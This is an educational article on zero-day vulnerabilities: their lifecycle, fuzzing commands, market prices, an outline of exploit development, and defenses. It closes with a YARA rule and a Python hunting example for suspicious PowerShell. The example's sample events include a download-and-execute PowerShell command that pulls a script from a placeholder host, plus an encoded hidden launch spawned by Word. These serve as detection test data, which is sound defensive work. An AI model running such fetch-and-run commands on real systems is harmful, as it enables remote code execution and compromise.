Key Takeaways

  • Zero-day = unknown to vendor, no patch exists
  • iOS zero-days sell for $2M+ on gray market
  • Fuzzing is primary discovery method
  • Defense in depth mitigates unknown threats

1. What is a Zero-Day?

A zero-day (0-day) vulnerability is a software flaw unknown to the vendor or public. The term "zero-day" refers to the fact that developers have had zero days to fix it. Zero-day exploits leverage these vulnerabilities before patches exist.

Terminology

2. Zero-Day Lifecycle

  1. Discovery: Researcher/attacker finds vulnerability
  2. Weaponization: Exploit code developed
  3. Exploitation: Used in attacks (if malicious)
  4. Disclosure: Reported to vendor or made public
  5. Patch release: Vendor creates fix
  6. Patch adoption: Users apply updates

The Danger Window

The time between exploit discovery and patch deployment is when organizations are most vulnerable. Average time-to-patch is 60-150 days for critical vulnerabilities.

3. Discovery Methods

Fuzzing

# AFL (American Fuzzy Lop)
afl-fuzz -i input_dir -o output_dir -- ./target @@

# LibFuzzer
clang -fsanitize=fuzzer,address target.c -o fuzzer
./fuzzer corpus/

# Honggfuzz
honggfuzz -i input_dir -- ./target ___FILE___

# Fuzzing finds crashes → analyze for exploitability

Code Auditing

# Static analysis tools
- Semgrep (pattern matching)
- CodeQL (semantic analysis)
- Coverity (enterprise)

# Manual code review focuses on:
- Memory management (malloc/free)
- Input validation
- Integer overflows
- Type confusion
- Logic flaws

Reverse Engineering

# Binary analysis with Ghidra/IDA
# Look for:
- Dangerous functions (strcpy, sprintf)
- Missing bounds checks
- Type mismatches
- Race conditions

4. Zero-Day Market

Market Types

Approximate Prices (2024)

Target                         Price Range
iOS Zero-Click RCE             $2,000,000+
Android Zero-Click             $1,500,000+
Windows RCE                    $500,000 - $1,000,000
Chrome RCE + Sandbox Escape    $500,000+
Enterprise Server RCE          $100,000 - $500,000

5. Famous Zero-Days

6. Exploit Development Basics

# Exploit development workflow:
1. Identify vulnerability (crash analysis)
2. Understand root cause (debugging)
3. Control execution flow (EIP/RIP control)
4. Bypass mitigations (ASLR, DEP, CFG)
5. Achieve code execution (shellcode)
6. Weaponize (reliable exploit)

# Modern mitigations to bypass:
- ASLR: Information leaks
- DEP/NX: ROP chains
- Stack Canaries: Leak or bypass
- CFG/CFI: Corruption primitives

7. Defense Against Zero-Days

Multiple Layers of Defense

  • Endpoint Detection (EDR): Behavioral analysis catches unknown threats
  • Network segmentation: Limits lateral movement
  • Application sandboxing: Contains exploit impact
  • Least privilege: Limits what exploits can access
  • Exploit mitigations: ASLR, DEP, CFG enabled
  • Threat intelligence: IOCs for emerging threats
  • Patch quickly: Reduce N-day exposure window

8. Threat Hunting for Zero-Days

# Hunt for anomalies, not signatures
# Look for:
- Unusual process execution chains
- Living off the land techniques
- Memory-only malware
- Abnormal network connections
- Privilege escalation patterns

# YARA rules for behavioral patterns
rule Suspicious_PowerShell {
    strings:
        $a = "-enc" nocase
        $b = "-nop" nocase
        $c = "IEX" nocase
    condition:
        2 of them
}
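The same "2 of them" logic as the YARA rule above, applied to process-creation telemetry together with the parent/child anomaly check the hunting list mentions. This is an added example, not from the original page; the event schema (parent, image, cmdline), the sample events and the list of Office parents are constructed assumptions.

```python
from typing import Dict, List

# Constructed sample process-creation events (assumed fields: parent, image, cmdline).
# Made-up for illustration, not captured telemetry; the URL host is a reserved .invalid name.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -Command \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')\""},
    {"parent": "svchost.exe", "image": "notepad.exe", "cmdline": "notepad.exe readme.txt"},
]

# The three strings from the YARA rule, matched as substrings without regard to case.
YARA_STRINGS = ("-enc", "-nop", "IEX")

# Office binaries that should rarely spawn a shell (assumed baseline for this example).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def yara_like_hits(cmdline: str) -> List[str]:
    """Return which of the rule's strings occur in the command line (nocase)."""
    lower = cmdline.lower()
    # Note: "-nop" also matches the full "-NoProfile" flag, exactly as the YARA rule would.
    return [s for s in YARA_STRINGS if s.lower() in lower]


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks suspicious; an empty list means not flagged."""
    reasons: List[str] = []
    if event["image"].lower() != "powershell.exe":
        return reasons
    hits = yara_like_hits(event["cmdline"])
    if len(hits) >= 2:                      # mirrors "condition: 2 of them"
        reasons.append("obfuscated_powershell:" + ",".join(hits))
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office_spawned_shell:" + event["parent"])
    return reasons


def hunt(events: List[Dict[str, str]]):
    """Run the checks over every event and return only the flagged ones with their reasons."""
    flagged = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            flagged.append((event["cmdline"], reasons))
    return flagged
```

Because the string match alone also fires on the legitimate -NoProfile flag, the parent-process context is what separates the Office-spawned case from an administrator's cmd.exe session when triaging the results.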

FAQ

How are zero-days discovered?
Primarily through fuzzing, code auditing, and reverse engineering. Some are found accidentally during normal development or security research.

Should I sell zero-days?
Bug bounties and vendor programs are the ethical choice. Selling to gray/black market actors may be legal but enables surveillance and attacks.
